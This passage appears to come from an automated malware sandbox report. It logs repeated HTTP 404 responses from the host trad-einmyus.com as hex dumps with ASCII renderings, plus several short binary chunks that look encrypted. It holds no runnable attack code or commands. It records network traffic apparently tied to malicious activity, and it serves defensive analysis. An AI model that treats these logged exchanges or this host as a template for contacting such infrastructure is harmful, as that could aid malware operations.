30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:05 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:06 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:06 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:10 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:11 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:13 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 32 46 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f cc d5 54 02 6c 5c e5 aa 81 fc ab 12 ea 15 da 2d b8 45 52 9d 0b fe ee 3a ae 2f 4d 1b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2FI:82OTl\-ER:/M0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:20 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:21 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 34 46 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4F73|"s2h3T'cSc"8iz`;?Dt0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:21 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:22 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:23 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:24 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:24 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 31 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19D<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:24 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 35 45 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 83 54 0e 7d 17 be a1 83 bd ad 1d a1 52 dd 6d ba 19 59 9d 09 f4 a6 2d af 7b 64 0f a5 b4 89 18 c9 2d 84 1b 8f be 42 c3 5c 9a d3 f7 27 69 98 d0 4b 6b 80 a7 b4 0e 89 d3 cf 37 b2 33 ce 98 77 4d 1a 7d 4b 47 98 fc 64 a0 f2 5c 90 0d 0a 30 0d 0a 0d 0a Data Ascii: 5EI:82OT}RmY-{d-B\'iKk73wM}KGd\0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundserver: nginx/1.20.2date: Thu, 28 Mar 2024 16:51:27 GMTcontent-type: text/html; charset=utf-8transfer-encoding: chunkedData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 8d 43 09 65 0b f9 aa 85 a1 e4 12 ab 11 91 67 e7 55 5d 91 03 f2 eb 78 e1 2c 01 4e bf ae d8 1b ec 07 8f 46 87 ad 76 87 24 e9 ae 93 01 22 ee a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OCegU]x,NFv$"c0
